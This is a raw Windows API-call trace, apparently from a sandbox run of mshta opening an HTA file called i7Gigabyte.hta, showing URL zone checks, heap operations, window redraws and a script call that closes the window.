[0090.263] IUri:GetScheme (in: This=0x13c184, pdwScheme=0x398d54 | out: pdwScheme=0x398d54*=0x9) returned 0x0
[0090.263] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x398d34 | out: ppvObject=0x398d34*=0x13c184) returned 0x0
[0090.264] IUnknown:Release (This=0x13c184) returned 0x3
[0090.264] IUnknown:AddRef (This=0x13c184) returned 0x4
[0090.264] PathCreateFromUrlW (in: pszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pszPath=0x398d88, pcchPath=0x398d68, dwFlags=0x0 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta", pcchPath=0x398d68) returned 0x0
[0090.264] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x5c) returned 0x1518b8
[0090.264] IUnknown:Release (This=0x13c184) returned 0x3
[0090.264] GetWindowTextW (in: hWnd=0x20314, lpString=0x398900, nMaxCount=512 | out: lpString="") returned 0
[0090.264] NtdllDefWindowProc_W () returned 0x0
[0090.264] SetWindowTextW (hWnd=0x20314, lpString="C:\\Users\\kEecfMwgj\\Documents\\i7Gigabyte.hta") returned 1
[0090.264] NtdllDefWindowProc_W () returned 0x1
[0090.266] IUnknown:Release (This=0x13c184) returned 0x2
[0090.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1518b8 | out: hHeap=0x110000) returned 1
[0090.267] GetCurrentThreadId () returned 0xe84
[0090.267] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0090.267] SetTimer (hWnd=0x1034a, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0090.267] GetCurrentThreadId () returned 0xe84
[0090.675] GetWindowLongW (hWnd=0x1034a, nIndex=-21) returned 1317520
[0090.675] KillTimer (hWnd=0x1034a, uIDEvent=0x1008) returned 1
[0090.675] GetCurrentThreadId () returned 0xe84
[0090.956] IUnknown:Release (This=0x1b71a8) returned 0x1
[0090.956] GetCurrentThreadId () returned 0xe84
[0090.956] GetCurrentThreadId () returned 0xe84
[0090.957] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0090.957] IUnknown:Release (This=0x1525d8) returned 0x14
[0090.957] free (_Block=0x29bac98)
[0090.958] GetCurrentThreadId () returned 0xe84
[0090.958] GetCurrentThreadId () returned 0xe84
[0090.958] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0090.958] ??3@YAXPAX@Z () returned 0x1
[0090.958] IUnknown:Release (This=0x1525d8) returned 0x12
[0090.959] free (_Block=0x29bad38)
[0090.959] IUnknown:Release (This=0x1525d8) returned 0xf
[0090.959] GetCurrentThreadId () returned 0xe84
[0090.959] GetCurrentThreadId () returned 0xe84
[0090.959] ??3@YAXPAX@Z () returned 0x1
[0090.959] ISystemDebugEventFire:IsActive (This=0x174750) returned 0x1
[0090.959] ??3@YAXPAX@Z () returned 0x1
[0090.959] free (_Block=0x29bc6e8)
[0090.959] GetCurrentThreadId () returned 0xe84
[0090.959] GetCurrentThreadId () returned 0xe84
[0090.959] GetCurrentThreadId () returned 0xe84
[0090.959] GetCurrentThreadId () returned 0xe84
[0090.960] GetCurrentThreadId () returned 0xe84
[0091.160] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.160] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x24) returned 0x152ba8
[0091.160] LsSetDoc () returned 0x0
[0091.160] LsCreateLine ()
[0091.160] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.167] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.171] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.171] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x152ba8, Size=0x90) returned 0x1d6490
[0091.172] LsSetDoc () returned 0x0
[0091.172] LsCreateLine ()
[0091.172] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f070, lprcSrc1=0x39f070, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f070) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f108, lprcSrc1=0x39f108, lprcSrc2=0x39f070 | out: lprcDst=0x39f108) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f160, lprcSrc1=0x39f160, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f160) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f070, lprcSrc1=0x39f070, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f070) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f108, lprcSrc1=0x39f108, lprcSrc2=0x39f070 | out: lprcDst=0x39f108) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f160, lprcSrc1=0x39f160, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f160) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f070, lprcSrc1=0x39f070, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f070) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f108, lprcSrc1=0x39f108, lprcSrc2=0x39f070 | out: lprcDst=0x39f108) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f160, lprcSrc1=0x39f160, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f160) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f070, lprcSrc1=0x39f070, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f070) returned 1
[0091.172] IntersectRect (in: lprcDst=0x39f108, lprcSrc1=0x39f108, lprcSrc2=0x39f070 | out: lprcDst=0x39f108) returned 1
[0091.173] IntersectRect (in: lprcDst=0x39f160, lprcSrc1=0x39f160, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f160) returned 1
[0091.173] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.173] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.173] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.173] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.173] IntersectRect (in: lprcDst=0x39f76c, lprcSrc1=0x39f76c, lprcSrc2=0x39f73c | out: lprcDst=0x39f76c) returned 1
[0091.173] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f75c | out: lprcDst=0x162e80) returned 1
[0091.173] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f77c | out: lprcDst=0x162e80) returned 1
[0091.173] IntersectRect (in: lprcDst=0x39f42c, lprcSrc1=0x39f42c, lprcSrc2=0x39f3fc | out: lprcDst=0x39f42c) returned 1
[0091.173] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f41c | out: lprcDst=0x162e80) returned 1
[0091.173] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f43c | out: lprcDst=0x162e80) returned 1
[0091.173] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.173] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.173] UnionRect (in: lprcDst=0x39f648, lprcSrc1=0x39f648, lprcSrc2=0x39f5f4 | out: lprcDst=0x39f648) returned 1
[0091.173] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.173] UnionRect (in: lprcDst=0x39f988, lprcSrc1=0x39f988, lprcSrc2=0x39f934 | out: lprcDst=0x39f988) returned 1
[0091.173] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152ba8
[0091.173] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152ba8 | out: hHeap=0x110000) returned 1
[0091.173] RedrawWindow (hWnd=0x1034a, lprcUpdate=0x39fa08, hrgnUpdate=0x0, flags=0x21) returned 1
[0091.174] ScreenToClient (in: hWnd=0x1034a, lpPoint=0x39f938 | out: lpPoint=0x39f938) returned 1
[0091.174] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x8, Size=0x30) returned 0x1d2950
[0091.174] GetCurrentThreadId () returned 0xe84
[0091.179] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1d2950 | out: hHeap=0x110000) returned 1
[0091.180] GetFocus () returned 0x1034a
[0091.180] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0xc) returned 0x124888
[0091.180] NotifyWinEvent (event=0x8005, hwnd=0x1034a, idObject=1, idChild=0)
[0091.180] GetCurrentThreadId () returned 0xe84
[0091.180] SetTimer (hWnd=0x1034a, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0091.180] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x162208, Size=0x150) returned 0x1d45d0
[0091.180] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.180] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x50) returned 0x14e868
[0091.181] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14e868 | out: hHeap=0x110000) returned 1
[0091.181] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.181] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f848 | out: ppu=0x39f848) returned 0x0
[0091.181] IUnknown:AddRef (This=0x13c184) returned 0x3
[0091.181] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f7ec, dwFlags=0x0 | out: pdwZone=0x39f7ec*=0xffffffff) returned 0x800c0011
[0091.181] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.181] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.181] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0091.181] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f7f0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f7f0*=0x0) returned 0x0
[0091.181] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.181] IUnknown:Release (This=0x13c184) returned 0x2
[0091.181] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1dced8 | out: hHeap=0x110000) returned 1
[0091.181] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f804 | out: ppu=0x39f804) returned 0x0
[0091.181] IUnknown:AddRef (This=0x13c184) returned 0x3
[0091.181] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f7a4, dwFlags=0x0 | out: pdwZone=0x39f7a4*=0xffffffff) returned 0x800c0011
[0091.181] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.181] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.181] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0091.181] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f7a8, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f7a8*=0x0) returned 0x0
[0091.181] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.181] IUnknown:Release (This=0x13c184) returned 0x2
[0091.182] ParseURLW (in: pcszURL="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", ppu=0x39f794 | out: ppu=0x39f794) returned 0x0
[0091.182] IUnknown:AddRef (This=0x13c184) returned 0x3
[0091.182] IInternetSecurityManager:MapUrlToZone (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", pdwZone=0x39f734, dwFlags=0x0 | out: pdwZone=0x39f734*=0xffffffff) returned 0x800c0011
[0091.182] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.182] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.182] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0091.182] IInternetSecurityManager:ProcessUrlAction (in: This=0x73da96bc, pwszUrl="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", dwAction=0x1400, pPolicy=0x39f738, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x39f738*=0x0) returned 0x0
[0091.182] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0091.182] IUnknown:Release (This=0x13c184) returned 0x2
[0091.182] GetCurrentThreadId () returned 0xe84
[0091.182] SysStringLen (param_1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x33
[0091.182] SysStringLen (param_1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0x33
[0091.182] StrCmpIW (psz1="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta", psz2="file:///C:/Users/kEecfMwgj/Documents/i7Gigabyte.hta") returned 0
[0091.182] GetCurrentThreadId () returned 0xe84
[0091.182] realloc (_Block=0x0, _Size=0xc8) returned 0x29bc6e8
[0091.182] SysStringLen (param_1="cardTableMonitor['close']();") returned 0x1c
[0091.182] ??2@YAPAXI@Z () returned 0x29be750
[0091.182] malloc (_Size=0x804) returned 0x29bd778
[0091.182] ??2@YAPAXI@Z () returned 0x29bdf88
[0091.183] ??3@YAXPAX@Z () returned 0x1
[0091.183] ??2@YAPAXI@Z () returned 0x29bae20
[0091.183] free (_Block=0x29bd778)
[0091.183] ??3@YAXPAX@Z () returned 0x1
[0091.183] free (_Block=0x29cc148)
[0091.183] free (_Block=0x29bdf88)
[0091.183] free (_Block=0x29b5cd0)
[0091.183] ??2@YAPAXI@Z () returned 0x29bac98
[0091.183] ??2@YAPAXI@Z () returned 0x29b5cd0
[0091.183] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0091.183] CoGetObjectContext (in: riid=0x663b0270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x39f674 | out: ppv=0x39f674*=0x1369d0) returned 0x0
[0091.184] IUnknown:Release (This=0x1369d0) returned 0x1
[0091.184] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0091.184] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0091.184] ??2@YAPAXI@Z () returned 0x29cc148
[0091.184] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0
[0091.242] PostMessageW (hWnd=0x20314, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0091.243] GetCurrentThreadId () returned 0xe84
[0091.243] GetCurrentThreadId () returned 0xe84
[0091.243] ISystemDebugEventFire:IsActive (This=0x1742d0) returned 0x1
[0091.243] ??3@YAXPAX@Z () returned 0x1
[0091.244] free (_Block=0x29bc6e8)
[0091.244] GetCurrentThreadId () returned 0xe84
[0091.244] GetCurrentThreadId () returned 0xe84
[0091.244] GetCurrentThreadId () returned 0xe84
[0091.244] GetCurrentThreadId () returned 0xe84
[0091.244] GetCurrentThreadId () returned 0xe84
[0091.258] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x1497b8, Size=0xba0) returned 0x1497b8
[0091.258] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.258] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x13c838 | out: hHeap=0x110000) returned 1
[0091.259] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1dced8 | out: hHeap=0x110000) returned 1
[0091.259] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x150f60 | out: hHeap=0x110000) returned 1
[0091.261] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1c10c8 | out: hHeap=0x110000) returned 1
[0091.261] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x159020 | out: hHeap=0x110000) returned 1
[0091.262] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1545c0 | out: hHeap=0x110000) returned 1
[0091.262] IUnknown:Release (This=0x13be24) returned 0xe
[0091.262] IUnknown:Release (This=0x1467f8) returned 0x3
[0091.262] IUnknown:Release (This=0x13be24) returned 0xd
[0091.262] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.262] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.262] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x175c28 | out: hHeap=0x110000) returned 1
[0091.263] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x17d968 | out: hHeap=0x110000) returned 1
[0091.263] IUnknown:Release (This=0x13be24) returned 0xc
[0091.263] IUnknown:Release (This=0x1467f8) returned 0x2
[0091.263] IUnknown:Release (This=0x13be24) returned 0xb
[0091.263] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.263] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.263] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x155d28 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1534a8 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] IUnknown:Release (This=0x13be24) returned 0xa
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] IUnknown:Release (This=0x13be24) returned 0x9
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] IUnknown:Release (This=0x13be24) returned 0x8
[0091.264] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.264] IUnknown:Release (This=0x153968) returned 0x1
[0091.264] IUnknown:Release (This=0x153968) returned 0x0
[0091.265] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x150698 | out: hHeap=0x110000) returned 1
[0091.265] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.265] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.265] IUnknown:Release (This=0x13be24) returned 0x5
[0091.265] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x151098 | out: hHeap=0x110000) returned 1
[0091.266] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1532f0 | out: hHeap=0x110000) returned 1
[0091.266] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x153038 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x158e10 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x156d38 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x153170 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x150668 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.267] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.268] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x1531e0 | out: hHeap=0x110000) returned 1
[0091.268] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x14dec8 | out: hHeap=0x110000) returned 1
[0091.268] GetCurrentThreadId () returned 0xe84
[0091.269] GetCurrentThreadId () returned 0xe84
[0091.269] GetCurrentThreadId () returned 0xe84
[0091.270] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.271] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x24) returned 0x152ba8
[0091.271] LsSetDoc () returned 0x0
[0091.271] LsCreateLine ()
[0091.271] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.279] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.283] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.288] RtlReAllocateHeap (Heap=0x110000, Flags=0x0, Ptr=0x152ba8, Size=0x90) returned 0x1d6490
[0091.288] LsSetDoc () returned 0x0
[0091.288] LsCreateLine ()
[0091.288] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f070, lprcSrc1=0x39f070, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f070) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f108, lprcSrc1=0x39f108, lprcSrc2=0x39f070 | out: lprcDst=0x39f108) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f160, lprcSrc1=0x39f160, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f160) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f070, lprcSrc1=0x39f070, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f070) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f108, lprcSrc1=0x39f108, lprcSrc2=0x39f070 | out: lprcDst=0x39f108) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f160, lprcSrc1=0x39f160, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f160) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f070, lprcSrc1=0x39f070, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f070) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f108, lprcSrc1=0x39f108, lprcSrc2=0x39f070 | out: lprcDst=0x39f108) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f160, lprcSrc1=0x39f160, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f160) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f070, lprcSrc1=0x39f070, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f070) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f108, lprcSrc1=0x39f108, lprcSrc2=0x39f070 | out: lprcDst=0x39f108) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f160, lprcSrc1=0x39f160, lprcSrc2=0x39f0f8 | out: lprcDst=0x39f160) returned 1
[0091.289] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.289] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.289] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.289] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f76c, lprcSrc1=0x39f76c, lprcSrc2=0x39f73c | out: lprcDst=0x39f76c) returned 1
[0091.289] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f75c | out: lprcDst=0x162e80) returned 1
[0091.289] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f77c | out: lprcDst=0x162e80) returned 1
[0091.289] IntersectRect (in: lprcDst=0x39f42c, lprcSrc1=0x39f42c, lprcSrc2=0x39f3fc | out: lprcDst=0x39f42c) returned 1
[0091.289] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f41c | out: lprcDst=0x162e80) returned 1
[0091.289] IntersectRect (in: lprcDst=0x162e80, lprcSrc1=0x162e80, lprcSrc2=0x39f43c | out: lprcDst=0x162e80) returned 1
[0091.289] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.289] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.289] UnionRect (in: lprcDst=0x39f648, lprcSrc1=0x39f648, lprcSrc2=0x39f5f4 | out: lprcDst=0x39f648) returned 1
[0091.289] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x110000) returned 1
[0091.289] UnionRect (in: lprcDst=0x39f988, lprcSrc1=0x39f988, lprcSrc2=0x39f934 | out: lprcDst=0x39f988) returned 1
[0091.289] RtlAllocateHeap (HeapHandle=0x110000, Flags=0x0, Size=0x28) returned 0x152ba8
[0091.290] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x152ba8 | out: hHeap=0x110000) returned 1
[0091.290] RedrawWindow (hWnd=0x1034a, lprcUpdate=0x39fa08, hrgnUpdate=0x0, flags=0x21) returned 1
[0091.290] LoadStringW (in: hInstance=0x747d0000, uID=0x1fe9, lpBuffer=0x39f670, cchBufferMax=512 | out: lpBuffer="Done") returned 0x4
[0091.290] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x154550 | out: hHeap=0x110000) returned 1
[0091.291] HeapFree (in: hHeap=0x110000, dwFlags=0x0, lpMem=0x175b98 | out: hHeap=0x110000) returned 1
[0091.291] IUnknown:AddRef (This=0x13c184) returned 0x3
[0091.291] IUri:GetScheme (in: This=0x13c184, pdwScheme=0x39eafc | out: pdwScheme=0x39eafc*=0x9) returned 0x0
[0091.291] IUnknown:QueryInterface (in: This=0x13c184, riid=0x73a2d6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x39eadc | out: ppvObject=0x39eadc*=0x13c184) returned 0x0
[0091.291] IUnknown:Release (This=0x13c184) returned 0x3
